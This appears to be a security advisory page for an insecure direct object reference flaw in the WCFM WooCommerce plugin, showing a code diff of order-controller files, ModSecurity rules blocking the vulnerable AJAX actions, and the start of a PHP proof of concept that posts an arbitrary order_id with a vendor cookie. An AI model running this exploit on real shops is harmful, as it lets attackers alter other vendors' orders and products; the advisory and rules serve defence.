+                            $gross_sales += (float) $order->shipping_tax_amount;
+                        }
+                    }
+                    $item_qty = $order->quantity; //$line_item->get_quantity();
+                    $order_item_details .= '<div class=""><span class="qty">' . $order->quantity . 'x</span><span class="name">' . $line_item->get_name();
+                    if (! empty($line_item->get_variation_id())) {
+                        //$item_meta      = new WC_Order_Item_Meta( $line_item, $line_item->get_product() );
+                        //$item_meta_html = $item_meta->display( true, true );
+                        //$order_item_details .= '<span class="img_tip" data-tip="' . $item_meta_html . '"></span>';
+                    }
+                    $order_item_details .= '</span></div>';
+                } catch (Exception $e) {
+                    wcfm_log("order List Error ::" . $order->order_id . " => " . $e->getMessage());
+                    unset($wcfm_orders_json_arr[$index]);
+                    continue;
+                }
+                $order_item_details .= '</div>';
+
+                $wcfm_orders_json_arr[$index][] = '<a href="#" class="show_order_items">' . sprintf(_n('%d item', '%d items', $item_qty, 'wc-frontend-manager'), $item_qty) . '</a>' . $order_item_details;
+
+                // Quantity
+                $wcfm_orders_json_arr[$index][] =  $item_qty;
+
+                // Billing Address
+                $billing_address = '–';
+                if (apply_filters('wcfm_allow_customer_billing_details', true)) {
+                    if ($the_order->get_formatted_billing_address()) {
+                        $billing_address = wp_kses($the_order->get_formatted_billing_address(), array('br' => array()));
+                    }
+                }
+                $wcfm_orders_json_arr[$index][] = "<div style='text-align:left;float:left'>" . $billing_address . "</div>";
+
+                // Shipping Address
+                $shipping_address = '–';
+                if (apply_filters('wcfm_allow_customer_shipping_details', true)) {
+                    if ($the_order->needs_shipping_address() && $the_order->get_formatted_shipping_address()) {
+                        $shipping_address = wp_kses($the_order->get_formatted_shipping_address(), array('br' => array()));
+                    }
+                }
+                $wcfm_orders_json_arr[$index][] = "<div style='text-align:left;float:left'>" . $shipping_address . "</div>";
+
+                // Gross Sales
+                $gross_sales_amt = $gross_sales;
+                if ($order->is_partially_refunded) {
+                    $refunded_gross_sales = $gross_sales - (float) $order->refunded_amount;
+                    $gross_sales = '<del>' . wc_price($gross_sales, array('currency' => $order_currency)) . '</del>';
+                    $gross_sales .=  "<br/>" . wc_price($refunded_gross_sales, array('currency' => $order_currency));
+                } elseif ($order->is_refunded) {
+                    $gross_sales = '<del>' . wc_price($gross_sales, array('currency' => $order_currency)) . '</del>';
+                    $gross_sales .=  "<br/>" . wc_price(0, array('currency' => $order_currency));
+                } else {
+                    $gross_sales = wc_price($gross_sales, array('currency' => $order_currency));
+                }
+                if ($the_order->get_payment_method_title()) {
+                    $gross_sales .= '<br /><small class="meta">' . __('Via', 'wc-frontend-manager') . ' ' . esc_html($the_order->get_payment_method_title()) . '</small>';
+                }
+                $wcfm_orders_json_arr[$index][] =  $gross_sales;
+
+                // Gross Sales Amount
+                $wcfm_orders_json_arr[$index][] =  $gross_sales_amt;
+
+                // Commision && Commission Amount
+                $status = __('N/A', 'wc-frontend-manager');
+                $total  = 0;
+                if ('pending' === $order->withdraw_status) {
+                    $status = '<span class="wcpv-unpaid-status">' . esc_html__('UNPAID', 'wc-frontend-manager') . '</span>';
+                }
+
+                if ('completed' === $order->withdraw_status) {
+                    $status = '<span class="wcpv-paid-status">' . esc_html__('PAID', 'wc-frontend-manager') . '</span>';
+                }
+
+                if ('requested' === $order->withdraw_status) {
+                    $status = '<span class="wcpv-pending-status">' . esc_html__('REQUESTED', 'wc-frontend-manager') . '</span>';
+                }
+
+                if ('cancelled' === $order->withdraw_status) {
+                    $status = '<span class="wcpv-void-status">' . esc_html__('CANCELLED', 'wc-frontend-manager') . '</span>';
+                }
+
+                if ($order->is_refunded) {
+                    $wcfm_orders_json_arr[$index][] = '–';
+                    $wcfm_orders_json_arr[$index][] = '';
+                } else {
+                    $total = (float) $order->total_commission;
+                    if ($order->is_partially_refunded) {
+                        $gross_sales_amt = $gross_sales_amt - (float) $order->refunded_amount;
+                    }
+                    if ($admin_fee_mode) {
+                        $total = $gross_sales_amt - $total;
+                    }
+                    $wcfm_orders_json_arr[$index][] =  apply_filters('wcfm_vendor_order_total', wc_price($total, array('currency' => $order_currency)) . '<br />' . $status, $order->order_id, $order->product_id, $gross_sales_amt, $total, $status, $order_currency);
+                    $wcfm_orders_json_arr[$index][] = $total;
+                }
+
+                // Additional Info
+                $wcfm_orders_json_arr[$index][] = apply_filters('wcfm_orders_additonal_data', '–', $the_order->get_id());
+
+                // Custom Column Support Before
+                $wcfm_orders_json_arr = apply_filters('wcfm_orders_custom_columns_data_before', $wcfm_orders_json_arr, $index, $order->order_id, $order, $the_order);
+
+                // Date
+                $order_date = (version_compare(WC_VERSION, '2.7', '<')) ? $the_order->order_date : $the_order->get_date_created();
+                $wcfm_orders_json_arr[$index][] = apply_filters('wcfm_order_date_display', date_i18n(wc_date_format(), strtotime($order_date)), $order->order_id, $order);
+
+                // Action
+                $actions = '';
+                if ($wcfm_is_allow_order_status_update = apply_filters('wcfm_is_allow_order_status_update', true)) {
+                    $order_status = sanitize_title($the_order->get_status());
+                    if (!in_array($order_status, array('failed', 'cancelled', 'refunded', 'completed'))) $actions = '<a class="wcfm_order_mark_complete wcfm-action-icon" href="#" data-orderid="' . $order->order_id . '"><span class="wcfmfa fa-check-circle text_tip" data-tip="' . esc_attr__('Mark as Complete', 'wc-frontend-manager') . '"></span></a>';
+                }
+
+                if ($can_view_orders)
+                    $actions .= '<a class="wcfm-action-icon" href="' . get_wcfm_view_order_url($the_order->get_id(), $the_order) . '"><span class="wcfmfa fa-eye text_tip" data-tip="' . esc_attr__('View Details', 'wc-frontend-manager') . '"></span></a>';
+
+
+                if (!WCFM_Dependencies::wcfmu_plugin_active_check()) {
+                    if ($is_wcfmu_inactive_notice_show = apply_filters('is_wcfmu_inactive_notice_show', true)) {
+                        $actions .= '<a class="wcfm_wcvendors_order_mark_shipped_dummy wcfm-action-icon" href="#" data-orderid="' . $order->order_id . '"><span class="wcfmfa fa-truck text_tip" data-tip="' . esc_attr__('Mark Shipped', 'wc-frontend-manager') . '"></span></a>';
+                    }
+                }
+
+                $actions = apply_filters('wcfm_orders_module_actions', $actions, $order->order_id, $the_order, $this->vendor_id);
+
+                $wcfm_orders_json_arr[$index][] =  apply_filters('wcfmmarketplace_orders_actions', $actions, $user_id, $order, $the_order, $this->vendor_id);
+
+                $index++;
+            }
+        }
+        if (!empty($wcfm_orders_json_arr)) $wcfm_orders_json .= json_encode(apply_filters('wcfm_orders_controller_data', $wcfm_orders_json_arr, 'vendor', $this->vendor_id));
+        else $wcfm_orders_json .= '[]';
+        $wcfm_orders_json .= '
 													}';
-
-		echo $wcfm_orders_json;
-	}
-}
 No newline at end of file
+
+        echo $wcfm_orders_json;
+    }
+}
--- a/wc-frontend-manager/controllers/orders/wcfm-controller-wcfmmarketplace-orders.php
+++ b/wc-frontend-manager/controllers/orders/wcfm-controller-wcfmmarketplace-orders.php
@@ -14,365 +14,365 @@

 class WCFM_Orders_WCFMMarketplace_Controller {

-	private $vendor_id;
-	private $is_vendor_get_tax;
-	private $is_vendor_get_shipping;
-
-	public function __construct() {
-		global $wp, $WCFM, $WCFMmp;
-
-		if (wcfm_is_vendor()) {
-			if (defined('WCFM_REST_API_CALL')) {
-				$this->vendor_id   =  $WCFMmp->vendor_id = get_current_user_id();
-			} else {
-				$this->vendor_id   =  $WCFMmp->vendor_id;
-			}
-		} else {
-			if (isset($_POST['vendor_id']) && !empty($_POST['vendor_id'])) {
-				$this->vendor_id = absint($_POST['vendor_id']);
-			}
-		}
-
-		$this->is_vendor_get_tax      =  $WCFMmp->wcfmmp_vendor->is_vendor_get_tax($this->vendor_id);
-		$this->is_vendor_get_shipping =  $WCFMmp->wcfmmp_vendor->is_vendor_get_shipping($this->vendor_id);
-
-		$this->processing();
-	}
-
-	public function processing() {
-		global $WCFM, $WCFMmp, $wpdb, $_POST;
-
-		$length = 10;
-		$offset = 0;
-
-		if (isset($_POST['length'])) $length = absint($_POST['length']);
-		if (isset($_POST['start'])) $offset = absint($_POST['start']);
-
-		$user_id = $this->vendor_id;
-
-		$can_view_orders = apply_filters('wcfm_is_allow_order_details', true);
-		$group_manager_filter = apply_filters('wcfm_orders_group_manager_filter', '', 'vendor_id');
-
-		$the_orderby = !empty($_POST['orderby']) ? sanitize_sql_orderby($_POST['orderby']) : 'order_id';
-		$the_order   = (!empty($_POST['order']) && 'asc' === $_POST['order']) ? 'ASC' : 'DESC';
-		$allowed_status      = get_wcfm_marketplace_active_withdrwal_order_status_in_comma();
-		$allowed_status      = apply_filters('wcfmp_order_list_allowed_status', $allowed_status);
-
-		$items_per_page = $length;
-
-		$sql = 'SELECT COUNT(commission.ID) AS count FROM ' . $wpdb->prefix . 'wcfm_marketplace_orders AS commission';
-
-		$sql .= ' WHERE 1=1';
-
-		if ($group_manager_filter && !isset($_POST['vendor_id'])) {
-			$sql .= $group_manager_filter;
-		} else {
-			$sql .= " AND `vendor_id` = %d";
-			$sql = $wpdb->prepare($sql, $this->vendor_id);
-		}
-		if (apply_filters('wcfmmp_is_allow_order_status_filter', false)) {
-			$sql .= " AND commission.order_status IN ({$allowed_status})";
-		}
-		if (!apply_filters('wcfmmp_is_allow_show_trashed_orders', false)) {
-			$sql .= ' AND `is_trashed` = 0';
-		}
-
-		$sql = apply_filters('wcfmmp_order_query', $sql);
-
-		$status_filter = '';
-
-		// check if it is a search
-		if (!empty($_POST['search']['value'])) {
-			//$order_id = absint( $_POST['search']['value'] );
-			//if( function_exists( 'wc_sequential_order_numbers' ) ) { $order_id = wc_sequential_order_numbers()->find_order_by_order_number( $order_id ); }
-
-			//$sql .= " AND `order_id` = {$order_id}";
-
-			$wc_order_ids = wc_order_search($_POST['search']['value']);
-			if (!empty($wc_order_ids)) {
-				$wc_order_id_placeholders = implode(', ', array_fill(0, count($wc_order_ids), '%d'));
-				$sql .= " AND `order_id` in ( {$wc_order_id_placeholders} )";
-				$sql = $wpdb->prepare($sql, $wc_order_ids);
-			} else {
-				$sql .= " AND `order_id` in (0)";
-			}
-		} else {
-
-			if (!empty($_POST['filter_date_form']) && !empty($_POST['filter_date_to'])) {
-				$start_date = date('Y-m-d', strtotime(wc_clean($_POST['filter_date_form'])));
-				$end_date = date('Y-m-d', strtotime(wc_clean($_POST['filter_date_to'])));
-				$time_filter = " AND DATE( commission.created ) BETWEEN %s AND %s";
-				$sql .= $time_filter;
-				$sql = $wpdb->prepare($sql, $start_date, $end_date);
-			}
-
-			if (!empty($_POST['order_product'])) {
-				$order_product = absint($_POST['order_product']);
-				$status_filter = " AND `product_id` = %s";
-			}
-
-			if (!empty($_POST['commission_status'])) {
-				$commission_status = wc_clean($_POST['commission_status']);
-				$status_filter .= " AND `withdraw_status` = %s";
-			}
-
-			if (!empty($_POST['order_status'])) {
-				$order_status = wc_clean($_POST['order_status']);
-				if ($order_status != 'all') {
-					$status_filter .= " AND `commission_status` = %s";
-				} else {
-					$order_status = 	$_POST['order_status'] = '';
-				}
-			}
-
-			if ($status_filter) $sql .= $status_filter;
-			if (!empty($_POST['order_product']) && !empty($_POST['commission_status']) && !empty($_POST['order_status'])) $sql = $wpdb->prepare($sql, $order_product, $commission_status, $order_status);
-			if (!empty($_POST['order_product']) && !empty($_POST['commission_status']) && empty($_POST['order_status'])) $sql = $wpdb->prepare($sql, $order_product, $commission_status);
-			if (!empty($_POST['order_product']) && !empty($_POST['order_status']) && empty($_POST['commission_status'])) $sql = $wpdb->prepare($sql, $order_product, $order_status);
-			if (!empty($_POST['commission_status']) && !empty($_POST['order_status']) && empty($_POST['order_product'])) $sql = $wpdb->prepare($sql, $commission_status, $order_status);
-			if (!empty($_POST['order_product']) && empty($_POST['order_status']) && empty($_POST['commission_status'])) $sql = $wpdb->prepare($sql, $order_product);
-			if (!empty($_POST['commission_status']) && empty($_POST['order_status']) && empty($_POST['order_product'])) $sql = $wpdb->prepare($sql, $commission_status);
-			if (!empty($_POST['order_status']) && empty($_POST['commission_status']) && empty($_POST['order_product'])) $sql = $wpdb->prepare($sql, $order_status);
-		}
-		$sql .= " GROUP BY commission.order_id";
-
-		$total_item_results = $wpdb->get_results($sql);
-		$total_items = 0;
-		if (!empty($total_item_results)) {
-			foreach ($total_item_results as $total_item_result) {
-				$total_items++;
-			}
-		}
-		$total_items = apply_filters('wcfm_orders_total_count', $total_items, $this->vendor_id);
-
-		$sql = 'SELECT *, GROUP_CONCAT(ID) as commission_ids, GROUP_CONCAT(item_id) order_item_ids, GROUP_CONCAT(product_id) product_id, SUM( commission.quantity ) AS order_item_count, COALESCE( SUM( commission.item_total ), 0 ) AS item_total, COALESCE( SUM( commission.item_sub_total ), 0 ) AS item_sub_total, COALESCE( SUM( commission.shipping ), 0 ) AS shipping, COALESCE( SUM( commission.tax ), 0 ) AS tax, COALESCE( SUM( commission.shipping_tax_amount ), 0 ) AS shipping_tax_amount, COALESCE( SUM( commission.total_commission ), 0 ) AS total_commission, COALESCE( SUM( commission.discount_amount ), 0 ) AS discount_amount, COALESCE( SUM( commission.refunded_amount ), 0 ) AS refunded_amount, GROUP_CONCAT(is_refunded) is_refundeds, GROUP_CONCAT(refund_status) refund_statuses FROM ' . $wpdb->prefix . 'wcfm_marketplace_orders AS commission';
-
-		$sql .= ' WHERE 1=1';
-
-		if ($group_manager_filter && !isset($_POST['vendor_id'])) {
-			$sql .= $group_manager_filter;
-		} else {
-			$sql .= " AND `vendor_id` = %d";
-			$sql = $wpdb->prepare($sql, $this->vendor_id);
-		}
-		if (apply_filters('wcfmmp_is_allow_order_status_filter', false)) {
-			$sql .= " AND commission.order_status IN ({$allowed_status})";
-		}
-
-		if (!apply_filters('wcfmmp_is_allow_show_trashed_orders', false)) {
-			$sql .= ' AND `is_trashed` = 0';
-		}
-
-		$sql = apply_filters('wcfmmp_order_query', $sql);
-
-		// check if it is a search
-		if (!empty($_POST['search']['value'])) {
-			//$order_id = absint( $_POST['search']['value'] );
-			//if( function_exists( 'wc_sequential_order_numbers' ) ) { $order_id = wc_sequential_order_numbers()->find_order_by_order_number( $order_id ); }
-
-			//$sql .= " AND `order_id` = {$order_id}";
-
-			$wc_order_ids = wc_order_search($_POST['search']['value']);
-			if (!empty($wc_order_ids)) {
-				$wc_order_id_placeholders = implode(', ', array_fill(0, count($wc_order_ids), '%d'));
-				$sql .= " AND `order_id` in ( {$wc_order_id_placeholders} )";
-				$sql = $wpdb->prepare($sql, $wc_order_ids);
-			} else {
-				$sql .= " AND `order_id` in (0)";
-			}
-		} else {
-
-			if (!empty($_POST['filter_date_form']) && !empty($_POST['filter_date_to'])) {
-				$sql .= $time_filter;
-				$sql = $wpdb->prepare($sql, $start_date, $end_date);
-			}
-
-			if ($status_filter) $sql .= $status_filter;
-			if (!empty($_POST['order_product']) && !empty($_POST['commission_status']) && !empty($_POST['order_status'])) $sql = $wpdb->prepare($sql, $order_product, $commission_status, $order_status);
-			if (!empty($_POST['order_product']) && !empty($_POST['commission_status']) && empty($_POST['order_status'])) $sql = $wpdb->prepare($sql, $order_product, $commission_status);
-			if (!empty($_POST['order_product']) && !empty($_POST['order_status']) && empty($_POST['commission_status'])) $sql = $wpdb->prepare($sql, $order_product, $order_status);
-			if (!empty($_POST['commission_status']) && !empty($_POST['order_status']) && empty($_POST['order_product'])) $sql = $wpdb->prepare($sql, $commission_status, $order_status);
-			if (!empty($_POST['order_product']) && empty($_POST['order_status']) && empty($_POST['commission_status'])) $sql = $wpdb->prepare($sql, $order_product);
-			if (!empty($_POST['commission_status']) && empty($_POST['order_status']) && empty($_POST['order_product'])) $sql = $wpdb->prepare($sql, $commission_status);
-			if (!empty($_POST['order_status']) && empty($_POST['commission_status']) && empty($_POST['order_product'])) $sql = $wpdb->prepare($sql, $order_status);
-		}
-
-		$sql .= " GROUP BY commission.order_id";
-
-		$sql .= " ORDER BY {$the_orderby} {$the_order} LIMIT %d OFFSET %d";
-		$sql = $wpdb->prepare($sql, [
-			$items_per_page,
-			$offset
-		]);
-
-		$data = $wpdb->get_results($sql);
-
-		$order_summary = $data;
-
-		$admin_fee_mode = apply_filters('wcfm_is_admin_fee_mode', false);
-
-		$order_sync  = isset($WCFMmp->wcfmmp_marketplace_options['order_sync']) ? $WCFMmp->wcfmmp_marketplace_options['order_sync'] : 'no';
-
-
-		if (defined('WCFM_REST_API_CALL')) {
-			return $order_summary;
-		}
-
-		// Generate Orders JSON
-		$datatable_json = [
-			'draw'				=> (int) wc_clean($_POST['draw']),
-			'recordsTotal'		=> (int) $total_items,
-			'recordsFiltered'	=> (int) $total_items,
-			'data'				=> []
-		];
-
-		if (!empty($order_summary)) {
-			$index = 0;
-			$totals = 0;
-			foreach ($order_summary as $order) {
-				// Order exists check
-				$the_order = wc_get_order($order->order_id);
-				if (!is_a($the_order, 'WC_Order')) continue;
-
-				if (apply_filters('wcfm_is_show_order_restrict_check', false, $order->order_id, $order->product_id, $order)) continue;
-
-				$order_currency = $the_order->get_currency();
-				$needs_shipping = false;
-
-				$refund_statuses = explode(",", $order->refund_statuses);
-				$is_refundeds = explode(",", $order->is_refundeds);
-
-				if ($order_sync == 'yes') {
-					$order_status = sanitize_title($the_order->get_status());
-				} else {
-					$order_status = sanitize_title($order->commission_status);
-				}
-
-				// Status
-				if ($order_sync == 'yes') {
-					$datatable_json['data'][$index][] =  apply_filters('wcfm_order_status_display', '<span class="order-status tips wcicon-status-default wcicon-status-' . sanitize_title($order_status) . ' text_tip" data-tip="' . wc_get_order_status_name($order_status) . '"></span>', $the_order);
-				} else {
-					$datatable_json['data'][$index][] =  apply_filters('wcfm_order_status_display', '<span class="order-status tips wcicon-status-default wcicon-status-' . sanitize_title($order_status) . ' text_tip" data-tip="' . $WCFMmp->wcfmmp_vendor->wcfmmp_vendor_order_status_name($order_status) . '"></span>', $the_order);
-				}
-
-				// Custom Column Support After
-				$datatable_json['data'] = apply_filters('wcfm_orders_custom_columns_data_after', $datatable_json['data'], $index, $order->ID, $order, $the_order);
-
-				// Order
-				if (apply_filters('wcfm_allow_view_customer_name', true)) {
-					$user_info = array();
-					if ($the_order->get_user_id()) {
-						$user_info = get_userdata($the_order->get_user_id());
-					}
-
-					if (!empty($user_info)) {
-
-						$username = '';
-
-						if ($user_info->first_name || $user_info->last_name) {
-							$username .= esc_html(sprintf(_x('%1$s %2$s', 'full name', 'wc-frontend-manager'), ucfirst($user_info->first_name), ucfirst($user_info->last_name)));
-						} else {
-							$username .= esc_html(ucfirst($user_info->display_name));
-						}
-					} else {
-						if ($the_order->get_billing_first_name() || $the_order->get_billing_last_name()) {
-							$username = trim(sprintf(_x('%1$s %2$s', 'full name', 'wc-frontend-manager'), $the_order->get_billing_first_name(), $the_order->get_billing_last_name()));
-						} else if ($the_order->get_billing_company()) {
-							$username = trim($the_order->get_billing_company());
-						} else {
-							$username = __('Guest', 'wc-frontend-manager');
-						}
-					}
-
-					$username = apply_filters('wcfm_order_by_user', $username, $the_order->get_id());
-				} else {
-					$username = __('Guest', 'wc-frontend-manager');
-				}
-
-				$username = '<span class="wcfm_order_by_customer">' . $username . '</span>';
-
-				if ($can_view_orders) {
-					$datatable_json['data'][$index][] =  apply_filters('wcfmmp_order_label_display', apply_filters('wcfm_order_label_display', '<a href="' . get_wcfm_view_order_url($the_order->get_id(), $the_order) . '" class="wcfm_order_title">#' . esc_attr($the_order->get_order_number()) . '</a>' . ' ' . __('by', 'wc-frontend-manager') . ' ' . $username, $the_order->get_id(), $order->product_id, $order, $username), $the_order->get_id());
-				} else {
-					$datatable_json['data'][$index][] =  apply_filters('wcfmmp_order_label_display', apply_filters('wcfm_order_label_display', '<span class="wcfm_order_title">#' . esc_attr($the_order->get_order_number()) . '</span> ' . __('by', 'wc-frontend-manager') . ' ' . $username, $the_order->get_id(), $order->product_id, $order, $username), $the_order->get_id());
-				}
-
-				// Purchased
-				$order_item_details = '<div class="order_items order_items_visible" cellspacing="0">';
-				$order_item_ids = explode(",", $order->order_item_ids);
-				try {
-					foreach ($order_item_ids as $order_item_id) {
-						if ($order_item_id) {
-							$line_item = new WC_Order_Item_Product($order_item_id);
-							$product   = $line_item->get_product();
-							$item_meta_html = strip_tags(wc_display_item_meta($line_item, array(
-								'before'    => "n- ",
-								'separator' => "n- ",
-								'after'     => "",
-								'echo'      => false,
-								'autop'     => false,
-							)));
-
-							$order_item_details .= '<div class=""><span class="qty">' . $line_item->get_quantity() . 'x</span><span class="name">' . apply_filters('wcfm_order_item_name', $line_item->get_name(), $line_item);
-							if ($product && $product->get_sku()) {
-								$order_item_details .= ' (' . __('SKU:', 'wc-frontend-manager') . ' ' . esc_html($product->get_sku()) . ')';
-							}
-							if (!empty($item_meta_html) && apply_filters('wcfm_is_allow_order_list_item_meta', false)) $order_item_details .= '<br />(' . $item_meta_html . ')';
-							$order_item_details .= '</span></div>';
-						} else {
-							do_action('wcfm_manual_order_reset', $order->order_id, true);
-							$order_posted = OrderUtil::custom_orders_table_usage_is_enabled() ? wc_get_order($order->order_id) : get_post($order->order_id);
-							do_action('wcfm_manual_order_processed', $order->order_id, $order_posted, $the_order);
-							//unset( $datatable_json['data'][$index] );
-							break;
-						}
-					}
-				} catch (Exception $e) {
-					wcfm_log("Order List Error ::" . $order->order_id . " => " . $e->getMessage());
-					if (apply_filters('wcfm_is_allow_repair_order_item', false)) {
-						do_action('wcfm_manual_order_reset', $order->order_id, true);
-						$order_posted = OrderUtil::custom_orders_table_usage_is_enabled() ? wc_get_order($order->order_id) : get_post($order->order_id);
-						do_action('wcfm_manual_order_processed', $order->order_id, $order_posted, $the_order);
-						//do_action( 'wcfm_order_repair_order_item', $order->order_id );
-					}
-					unset($datatable_json['data'][$index]);
-					continue;
-				}
-				$order_item_details .= '</div>';
-
-				$datatable_json['data'][$index][] = '<a href="#" class="show_order_items">' . sprintf(_n('%d item', '%d items', $order->order_item_count, 'wc-frontend-manager'), $order->order_item_count) . '</a>' . $order_item_details;
-
-				// Quantity
-				$datatable_json['data'][$index][] =  $order->order_item_count;
-
-				// Billing Address
-				$billing_address = '–';
-				if (apply_filters('wcfm_allow_customer_billing_details', true)) {
-					if ($the_order->get_formatted_billing_address()) {
-						$billing_address = wp_kses($the_order->get_formatted_billing_address(), array('br' => array()));
-					}
-				}
-				$datatable_json['data'][$index][] = "<div style='text-align:left;'>" . apply_filters('wcfm_orderlist_billing_address', $billing_address, $order->order_id) . "</div>";
-
-				// Shipping Address
-				$shipping_address = '–';
-				if (apply_filters('wcfm_allow_customer_shipping_details', true)) {
-					if (($the_order->needs_shipping_address() && $the_order->get_formatted_shipping_address()) || apply_filters('wcfm_is_force_shipping_address', false)) {
-						$shipping_address = wp_kses($the_order->get_formatted_shipping_address(), array('br' => array()));
-					}
-				}
-				$datatable_json['data'][$index][] = "<div style='text-align:left;'>" . apply_filters('wcfm_orderlist_shipping_address', $shipping_address, $order->order_id) . "</div>";
+    private $vendor_id;
+    private $is_vendor_get_tax;
+    private $is_vendor_get_shipping;
+
+    public function __construct() {
+        global $wp, $WCFM, $WCFMmp;
+
+        if (wcfm_is_vendor()) {
+            if (defined('WCFM_REST_API_CALL')) {
+                $this->vendor_id   =  $WCFMmp->vendor_id = get_current_user_id();
+            } else {
+                $this->vendor_id   =  $WCFMmp->vendor_id;
+            }
+        } else {
+            if (isset($_POST['vendor_id']) && !empty($_POST['vendor_id'])) {
+                $this->vendor_id = absint($_POST['vendor_id']);
+            }
+        }
+
+        $this->is_vendor_get_tax      =  $WCFMmp->wcfmmp_vendor->is_vendor_get_tax($this->vendor_id);
+        $this->is_vendor_get_shipping =  $WCFMmp->wcfmmp_vendor->is_vendor_get_shipping($this->vendor_id);
+
+        $this->processing();
+    }
+
+    public function processing() {
+        global $WCFM, $WCFMmp, $wpdb, $_POST;
+
+        $length = 10;
+        $offset = 0;
+
+        if (isset($_POST['length'])) $length = absint($_POST['length']);
+        if (isset($_POST['start'])) $offset = absint($_POST['start']);
+
+        $user_id = $this->vendor_id;
+
+        $can_view_orders = apply_filters('wcfm_is_allow_order_details', true);
+        $group_manager_filter = apply_filters('wcfm_orders_group_manager_filter', '', 'vendor_id');
+
+        $the_orderby = !empty($_POST['orderby']) ? sanitize_sql_orderby($_POST['orderby']) : 'order_id';
+        $the_order   = (!empty($_POST['order']) && 'asc' === $_POST['order']) ? 'ASC' : 'DESC';
+        $allowed_status      = get_wcfm_marketplace_active_withdrwal_order_status_in_comma();
+        $allowed_status      = apply_filters('wcfmp_order_list_allowed_status', $allowed_status);
+
+        $items_per_page = $length;
+
+        $sql = 'SELECT COUNT(commission.ID) AS count FROM ' . $wpdb->prefix . 'wcfm_marketplace_orders AS commission';
+
+        $sql .= ' WHERE 1=1';
+
+        if ($group_manager_filter && !isset($_POST['vendor_id'])) {
+            $sql .= $group_manager_filter;
+        } else {
+            $sql .= " AND `vendor_id` = %d";
+            $sql = $wpdb->prepare($sql, $this->vendor_id);
+        }
+        if (apply_filters('wcfmmp_is_allow_order_status_filter', false)) {
+            $sql .= " AND commission.order_status IN ({$allowed_status})";
+        }
+        if (!apply_filters('wcfmmp_is_allow_show_trashed_orders', false)) {
+            $sql .= ' AND `is_trashed` = 0';
+        }
+
+        $sql = apply_filters('wcfmmp_order_query', $sql);
+
+        $status_filter = '';
+
+        // check if it is a search
+        if (!empty($_POST['search']['value'])) {
+            //$order_id = absint( $_POST['search']['value'] );
+            //if( function_exists( 'wc_sequential_order_numbers' ) ) { $order_id = wc_sequential_order_numbers()->find_order_by_order_number( $order_id ); }
+
+            //$sql .= " AND `order_id` = {$order_id}";
+
+            $wc_order_ids = wc_order_search($_POST['search']['value']);
+            if (!empty($wc_order_ids)) {
+                $wc_order_id_placeholders = implode(', ', array_fill(0, count($wc_order_ids), '%d'));
+                $sql .= " AND `order_id` in ( {$wc_order_id_placeholders} )";
+                $sql = $wpdb->prepare($sql, $wc_order_ids);
+            } else {
+                $sql .= " AND `order_id` in (0)";
+            }
+        } else {
+
+            if (!empty($_POST['filter_date_form']) && !empty($_POST['filter_date_to'])) {
+                $start_date = date('Y-m-d', strtotime(wc_clean($_POST['filter_date_form'])));
+     

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-4896
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:1004896,phase:2,deny,status:403,chain,msg:'CVE-2026-4896 - WCFM Plugin IDOR via wcfm_modify_order_status AJAX',severity:'CRITICAL',tag:'CVE-2026-4896',tag:'WAF',tag:'WordPress',tag:'WCFM'"
  SecRule ARGS_POST:action "@streq wcfm_modify_order_status" "chain"
    SecRule &ARGS_POST:order_id "!@eq 0" 
      "t:none,setvar:'tx.cve_2026_4896_match=1'"

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:1004897,phase:2,deny,status:403,chain,msg:'CVE-2026-4896 - WCFM Plugin IDOR via delete_wcfm_product AJAX',severity:'CRITICAL',tag:'CVE-2026-4896',tag:'WAF',tag:'WordPress',tag:'WCFM'"
  SecRule ARGS_POST:action "@streq delete_wcfm_product" "chain"
    SecRule &ARGS_POST:productid "!@eq 0" 
      "t:none,setvar:'tx.cve_2026_4896_match=1'"

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:1004898,phase:2,deny,status:403,chain,msg:'CVE-2026-4896 - WCFM Plugin IDOR via delete_wcfm_article AJAX',severity:'CRITICAL',tag:'CVE-2026-4896',tag:'WAF',tag:'WordPress',tag:'WCFM'"
  SecRule ARGS_POST:action "@streq delete_wcfm_article" "chain"
    SecRule &ARGS_POST:articleid "!@eq 0" 
      "t:none,setvar:'tx.cve_2026_4896_match=1'"

# Block requests that matched any of the vulnerable AJAX actions with an object ID parameter.
SecRule TX:cve_2026_4896_match "@eq 1" 
  "id:1004899,phase:2,deny,status:403,msg:'CVE-2026-4896 - WCFM Plugin Insecure Direct Object Reference Blocked',severity:'CRITICAL',tag:'CVE-2026-4896'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-4896 - WCFM - WooCommerce Frontend Manager <= 6.7.25 - Insecure Direct Object References to Autenticated (Vendor+) Arbitrary Post/Product Manipulation
<?php

$target_url = 'https://example.com/wp-admin/admin-ajax.php';
$vendor_cookie = 'wordpress_logged_in_<hash>'; // Replace with a valid authenticated session cookie for a Vendor user.

// Function to demonstrate order status modification IDOR.
function poc_modify_order_status($target_order_id) {
    global $target_url, $vendor_cookie;
    
    $post_data = array(
        'action' => 'wcfm_modify_order_status',
        'order_id' => $target_order_id,
        'order_status' => 'completed' // Arbitrary status to set.
    );
    
    $ch = curl_init($target_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
